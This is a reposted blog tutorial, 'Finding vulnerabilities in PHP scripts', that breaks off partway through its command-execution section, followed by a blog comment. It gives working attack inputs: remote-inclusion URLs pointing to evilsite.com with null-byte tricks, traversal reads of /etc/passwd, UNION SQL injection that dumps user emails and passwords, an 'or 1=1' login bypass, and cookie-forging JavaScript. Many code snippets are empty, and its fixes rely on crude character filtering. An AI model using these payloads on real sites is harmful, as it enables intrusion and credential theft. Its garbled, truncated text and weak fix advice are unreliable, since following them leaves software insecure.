Finding vulnerabilities in PHP scripts FULL ( with examples )

Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08@gmail.com
Contents :

1) About
2) Some stuff
3) Remote File Inclusion
3.0 – Basic example
3.1 – Simple example
3.2 – How to fix
4) Local File Inclusion
4.0 – Basic example
4.1 – Simple example
4.2 – How to fix
5) Local File Disclosure/Download
5.0 – Basic example
5.1 – Simple example
5.2 – How to fix
6) SQL Injection
6.0 – Basic example
6.1 – Simple example
6.2 – SQL Login Bypass
6.3 – How to fix
7) Insecure Cookie Handling
7.0 – Basic example
7.1 – Simple example
7.2 – How to fix
8) Remote Command Execution
8.0 – Basic example
8.1 – Simple example
8.2 – Advanced example
8.3 – How to fix
9) Remote Code Execution
9.0 – Basic example
9.1 – Simple example
9.2 – How to fix
10) Cross-Site Scripting
10.0 – Basic example
10.1 – Another example
10.2 – Simple example
10.3 – How to fix
11) Authentication Bypass
11.0 – Basic example
11.1 – Via login variable
11.2 – Unprotected Admin CP
11.3 – How to fix
12) Insecure Permissions
12.0 – Basic example
12.1 – Read the users/passwords
12.2 – Download backups
12.3 – INC files
12.4 – How to fix
13) Cross Site Request Forgery
13.0 – Basic example
13.1 – Simple example
13.2 – How to fix
14) Shoutz

1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the
examples without the basic example of each category was founded in different scripts.

2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
configuration I use and why :

safe_mode = off ( a lot of shit cannot be done with this on )
disabled_functions = N/A ( no one,we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( this will escape ‘ ” \ and NUL’s with a backslash and we don’t want that )
short_tag_open = on ( some scripts are using short tags,better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors,maybe some undeclared variables? )

How to proceed : First,create a database to be used by different scripts.Install the script on
localhost and start the audit over the source code.If you found something open the web browser and
test it,maybe you are wrong.

3) Remote File Inclusion

– Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( http filtered )

In PHP is 4 functions through you can include code.

require – require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once – is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include – includes and evaluates the specified file.
include_once – includes and evaluates the specified file during the execution of the script.

3.0 – Basic example

– Tips : some scripts don’t accept “http” in variables,”http” word is forbbiden so
you can use “https” or “ftp”.

– Code snippet from test.php

———————————————–

———————————————–

– If we access the page we got some errors and some warnings( not pasted ) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

– We can see here that “pagina” variable is undeclared.We can set any value to “pagina” variable.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Now I will show why some people use ? and %00 after the link to the evil script.

# The “%00”

– Code snippet from test.php

———————————————–

———————————————–

– So if we will request

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Will not work because the script will try to include http://evilsite.com/evilscript.txt.php

So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in
consideration.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

The script will successfully include our evilscript and will throw to junk the things
after the nullbyte.

# The “?”

– Code snippet from test.php

———————————————–

———————————————–

And the logged=1 will become like a variable.But better use nullbyte.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1

The evilscript will be included succesfully.

3.1 – Simple example

Now an example from a script.

– Code snippet from index.php

—————————————————-
if (isset($_REQUEST[“main_content”])){
$main_content = $_REQUEST[“main_content”];
} else if (isset($_SESSION[“main_content”])){
$main_content = $_SESSION[“main_content”];
}
…………………..etc………………
ob_start();
require_once($main_content);
—————————————————-

We can see that “main_content” variable is requested by $_REQUEST method.The attacker can
set any value that he want. Below the “main_content” variable is include.So if we make the
following request :

http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt

Our evil script will be successfully included.

3.2 – How to fix

Simple way : Don’t allow special chars in variables.Simple way : filter the slash “/” .
Another way : filter “http” , “https” , “ftp” and “smb”.

4) Local File Inclusion

– Tips : You can use the NULLBYTE and ? trick.
../ mean a directory up
On Windows systems we can use “..\” instead of “../” .The “..\” will become “..%5C” ( urlencoded ).

The same functions which let you to include (include,include_once,require,require_once) .

4.0 – Basic example

– Code snippet from test.php

———————————–

———————————–

Now,we can not include our script because we can not include remote files.We can include only
local files as you see.So if we make the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The script will include “/pages/../../../../../../etc/passwd” successfully.

You can use the %00 and ? .The same story.

4.1 – Simple example

– Code snippet from install/install.php

————————————-
if(empty($_GET[“url”]))
$url = ‘step_welcome.php’;
else
$url = $_GET[“url”];
………….etc………….

————————————-

We can see that “url” variable is injectable.If the “url” variable is not set
(is empty) the script will include “step_welcome.php” else will include the
variable set by the attacker.

So if we do the following request :

http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd

The “etc/passwd” file will be succesfully included.

4.2 – How to fix

Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”
Another way : Filter “/” , “\” and “.” .

5) Local File Disclosure/Download

– Tips : Through this vulnerability you can read the content of files,not include.

Some functions which let you to read files :

file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()

5.0 – Basic example

– Code snippet from test.php

————————————–

————————————–

The readfile() function will read the content of the specified file.So if we do the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The content of etc/passwd will be outputed NOT included.

5.1 – Simple example

– Code snippet from download.php

———————————————————————————–
$file = $_SERVER[“DOCUMENT_ROOT”]. $_REQUEST[‘file’];
header(“Pragma: public”);
header(“Expires: 0”);
header(“Cache-Control: must-revalidate, post-check=0, pre-check=0”);

header(“Content-Type: application/force-download”);
header( “Content-Disposition: attachment; filename=”.basename($file));

//header( “Content-Description: File Transfer”);
@readfile($file);
die();
———————————————————————————–

The “file” variable is unsecure.We see in first line that it is requested by $_REQUEST method.
And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
If we make the following request :

http://127.0.0.1/download.php?file=../../../../../../etc/passwd

So we can succesfully read the “etc/passwd” file.

5.2 – How to fix

Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”
Another way : Filter “/” , “\” and “.” .

6) SQL Injection

– Tips : If the user have file privileges you can read files.
If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
you can upload you code into a file.

6.0 – Basic example

– Code snippet from test.php

———————————————————————————-

———————————————————————————-

The “id” variable is not filtered.We can inject our SQL code in “id” variable.Example :

http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file(‘etc/passwd’),4–

And we get the “etc/passwd” file if magic_quotes = off ( escaping ‘ ) and users have
file privileges.

6.1 – Simple example

– Code snippet from house/listing_view.php

—————————————————————————————————————————–
$id = $_GET[‘itemnr’];
require_once($home.”mysqlinfo.php”);
$query = “SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id”;
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
—————————————————————————————————————————–

We see that “id” variable value is the value set for “itemnr” and is not filtered in any way.
So we can inject our code.Lets make a request :

http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users–

And we get the email and the password from the users table.

6.2 – SQL Injection Login Bypass

– Code snippet from /admin/login.php

——————————————————————————————————————————
$postbruger = $_POST[‘username’];
$postpass = md5($_POST[‘password’]);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass'”)
or die(“

” . mysql_error() . “

\n”);
——————————————————————————————————————————

The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :

username : admin ‘ or ‘ 1=1
password : sirgod

We logged in.Why?Look,the code will become

———————————————————————————————————————————
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod'”)
———————————————————————————————————————————

Login bypassed.The username must be an existent username.

6.3 – How to fix

Simple way : Don’t allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET[‘id’];
Another way : For non-numeric variables : filter all special chars used in
SQLI : – , . ( ) ‘ ” _ + / *

7) Insecure Cooke Handling

– Tips : Write the code in the URLbar,don’t use a cookie editor for this.

7.0 – Basic example

– Code snippet from test.php

—————————————————————
if($_POST[‘password’] == $thepass) {
setcookie(“is_user_logged”,”1″);
} else { die(“Login failed!”); }
………… etc ……………..
if($_COOKIE[‘is_user_logged’]==”1″)
{ include “admin.php”; else { die(‘not logged’); }
—————————————————————

Something interesting here.If we set to the “is_user_logged” variable
from cookie value “1” we are logged in.Example :

javascript:document.cookie = “is_user_logged=1; path=/”;

So practically we are logged in,we pass the check and we can access the admin panel.

7.1 – Simple example

– Code snippet from admin.php

—————————————————————-
if ($_COOKIE[PHPMYBCAdmin] == ”) {
if (!$_POST[login] == ‘login’) {
die(“Please Login:
“);
} elseif($_POST[password] == $bcadminpass) {
setcookie(“PHPMYBCAdmin”,”LOGGEDIN”, time() + 60 * 60);
header(“Location: admin.php”); } else { die(“Incorrect”); }
}
—————————————————————-

Code looks exploitable.We can set a cookie value that let us to bypass the login
and tell to the script that we are already logged in.Example :

javascript:document.cookie = “PHPMYBCAdmin=LOGGEDIN; path=/”;document.cookie = “1246371700; path=/”;

What is 1246371700? Is the current time() echo’ed + 360.

7.2 – How to fix

Simple way : The most simple and eficient way : use SESSIONS .

8) Remote Command Execution

– Tips : If in script is used exec() you can’t see the command output(but the command is executed)
until the result isn’t echo’ed from script.
You can use AND operator ( || ) if the script execute more than one command .

In PHP are some functions that let you to execute commands :

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

8.0 – Basic example

– Code snippet from test.php

———————————

———————————

So if we make the following request :

http://127.0.0.1/test.php?cmd=whoami

The command will be executed and the result will be outputed.

8.1 – Simple example

– Code snippet from dig.php

——————————————————————————————-
$status = $_GET[‘status’];
$ns = $_GET[‘ns’];
$host = $_GET[‘host’];
$query_type = $_GET[‘query_type’]; // ANY, MX, A , etc.
$ip = $_SERVER[‘REMOTE_ADDR’];
$self = $_SERVER[‘PHP_SELF’];
…………………… etc ……………………
$host = trim($host);
$host = strtolower($host);
echo(“Executing : dig @$ns $host $query_type
“);
echo ‘

~ oleh gipsylinux pada Oktober 3, 2009.

Satu Tanggapan to “Finding vulnerabilities in PHP scripts FULL ( with examples )”

  1. thanks this is a very usefull info for me,
    i think nulled scripts are easy to hack

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: